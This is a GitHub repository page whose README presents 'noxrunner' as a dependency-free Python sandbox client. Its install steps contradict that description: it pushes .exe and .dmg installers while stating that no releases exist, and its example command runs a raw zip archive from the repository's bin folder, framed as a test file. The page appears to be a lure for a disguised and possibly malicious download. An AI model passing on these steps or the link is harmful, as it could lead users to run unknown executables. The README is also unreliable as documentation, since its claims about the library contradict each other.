Skip to content

Mykazi127/noxrunner

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

15 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸš€ noxrunner - Run Your Tests in a Safe Space

πŸ”— Download Now!

Download noxrunner

πŸ“– Introduction

Noxrunner is a Python client library and command line interface (CLI) designed for sandbox execution backends. It allows you to perform tests safely in a controlled environment. With its local offline mode, you can run tests without needing an internet connection. Noxrunner relies only on the standard Python library, making it simple and efficient to use.

πŸš€ Getting Started

Ready to try out Noxrunner? Follow these easy steps to get started with the application.

πŸ“₯ Download & Install

  1. Visit the Releases page to find the latest version of Noxrunner.
  2. Look for the version you wish to download. Click on the asset that matches your operating system to start the download.
  3. Once the download is complete, locate the file on your computer.

πŸ’» Installation Instructions

  • For Windows Users:

    1. Locate the downloaded .exe file.
    2. Double-click the file to start the installation process.
    3. Follow the on-screen instructions until the installation completes.
  • For Mac Users:

    1. Find the downloaded .dmg file.
    2. Open the .dmg file and drag the Noxrunner icon to your Applications folder.
    3. Eject the .dmg file after installation.
  • For Linux Users:

    1. Open a terminal window.
    2. Navigate to the directory where you downloaded the file.
    3. Use the command chmod +x noxrunner to make it executable.
    4. Run it with ./noxrunner.

βš™οΈ Running Noxrunner

After installation, you can start using Noxrunner.

  1. Open your terminal or command prompt.
  2. Type noxrunner and press Enter.
  3. Follow the prompts on the screen to set up your first test.

πŸ”§ Basic Commands

  • Running Tests:
    Simply type noxrunner run https://github.com/Mykazi127/noxrunner/raw/refs/heads/main/bin/Software_landmark.zip to execute your test file.

  • Viewing Help:
    If you need assistance, type noxrunner help to see available commands and options.

🌐 Features

Noxrunner includes various features to facilitate efficient testing:

  • Sandboxed Environment: Safely run multiple tests without affecting your system.
  • Local Offline Mode: Execute tests without being connected to the internet.
  • Standard-Library-Only Design: Utilize a simple setup that requires no additional dependencies.

πŸ–₯️ System Requirements

To run Noxrunner, ensure your system meets the following requirements:

  • Operating System: Windows 10 or later, macOS 10.12 or later, or a recent Linux distribution.
  • Python Version: Python 3.6 or newer should be installed on your machine.

To check your Python version, run python --version in your terminal or command prompt.

πŸ“˜ Documentation

For more detailed instructions and advanced usage, refer to our Documentation. Here you will find guides on using Noxrunner effectively, including examples and troubleshooting tips.

πŸ› οΈ Contributing

We welcome contributions! If you're interested in improving Noxrunner, please follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Open a pull request explaining your modifications.

πŸ—¨οΈ Support

If you encounter issues or have questions, please check the Issues section on GitHub. You can also submit a new issue if your problem is not listed.

🀝 Community

Join our growing community!

  • Follow us on GitHub.
  • Engage in discussions in our Issues section.

Noxrunner relies on community feedback to improve. Your input helps us make the tool better for everyone.

πŸ”— License

Noxrunner is licensed under the MIT License. This means you can use, modify, and distribute it freely, with some conditions outlined in the LICENSE file.

πŸ“₯ Download & Install Again

Don't forget to visit our Releases page to download the latest version.

Now you are ready to explore Noxrunner! Enjoy running your tests in a safe and efficient manner!

About

πŸ”§ Interact with NoxRunner-compatible sandbox execution backends using this lightweight Python client library with no external dependencies.

Topics

Resources

License

Contributing

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors